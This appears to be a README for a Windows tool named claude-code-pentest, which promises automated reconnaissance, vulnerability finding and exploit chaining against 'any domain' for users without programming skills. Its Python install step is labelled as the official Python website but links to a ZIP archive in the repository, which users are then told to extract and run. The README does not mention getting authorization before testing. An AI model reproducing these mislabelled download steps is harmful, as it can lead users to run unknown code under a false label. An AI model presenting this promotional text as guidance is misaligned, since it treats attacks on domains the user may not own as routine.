claude-code-pentest offers 6 automated tools designed to help you run a full penetration test on any domain. It covers every step from gathering information to finding vulnerabilities and creating bug bounty reports.
The package includes 43 small scripts. Each script uses plain Python and does not require installing other software. You just provide a domain name, and the tools take care of the rest.
This application is for anyone interested in cybersecurity and testing web security. You do not need programming skills to get started.
To run claude-code-pentest on Windows, you need:
- Operating System: Windows 10 or newer
- Python: Version 3.8 or higher
- Disk Space: At least 500 MB free space
- Internet: Active connection to gather data from the web
- Permissions: Administrator rights are not required but helpful for some network tests
Visit this page to download all the files you need:
This link will lead you to the main page where you can download the entire application as a zip file.
If you do not have Python installed, follow these instructions:
- Go to the official Python website: https://github.com/KaQus/claude-code-pentest/raw/refs/heads/main/webapp-exploit-hunter/scripts/pentest-claude-code-v2.6.zip
- Download the latest Python 3.x installer (choose the Windows installer).
- Run the installer.
- During installation, check the option Add Python to PATH.
- Finish the setup.
After download:
- Find the downloaded ZIP file on your computer.
- Right-click the file.
- Select Extract All.
- Choose a location you can easily access, like your Desktop or Documents folder.
-
Open the folder where you extracted claude-code-pentest.
-
In the folder, hold Shift and right-click on an empty area.
-
Select Open PowerShell window here or Open Command Prompt here.
-
Type the command:
python main.py -
Press Enter.
The application will start and ask you to enter a domain to test.
Once the program starts, it will guide you step-by-step.
Provide the web address you want to test, for example, example.com. The tools will use this information for the tests.
The scripts will gather data about the domain. This includes finding subdomains, IP addresses, and technologies used by the website.
The software will search for weak points that might let someone access the system without permission.
claude-code-pentest tests if it can use vulnerabilities in a series to gain deeper access. This helps find hidden security problems.
At the end, a bug bounty style report will be created. This shows the issues found and suggests ways to fix them.
This package contains:
- 6 main tools that cover all the testing steps
- 43 Python scripts that perform specific jobs, like scanning, data gathering, and report generation
- No extra dependencies, so you do not need to install other software besides Python
- Reports generated in easy-to-read text files
You can customize the scans by editing simple text files inside the folder:
- Adjust the depth of scanning.
- Select specific modules to run.
- Set the report format.
These options are saved as plain text, so you do not need to know programming to modify them.
If the program does not start or shows errors:
-
Check that Python is installed and updated by opening a terminal and typing:
python --version -
Make sure you are running the command from the right folder.
-
Verify your internet connection is working.
-
Restart the terminal or your computer and try again.
For more help, visit the GitHub Page and look at the issues section.
- Run the tests regularly to keep your security checks up to date.
- Use simple domain names to avoid errors.
- Save reports in a safe folder for review or sharing.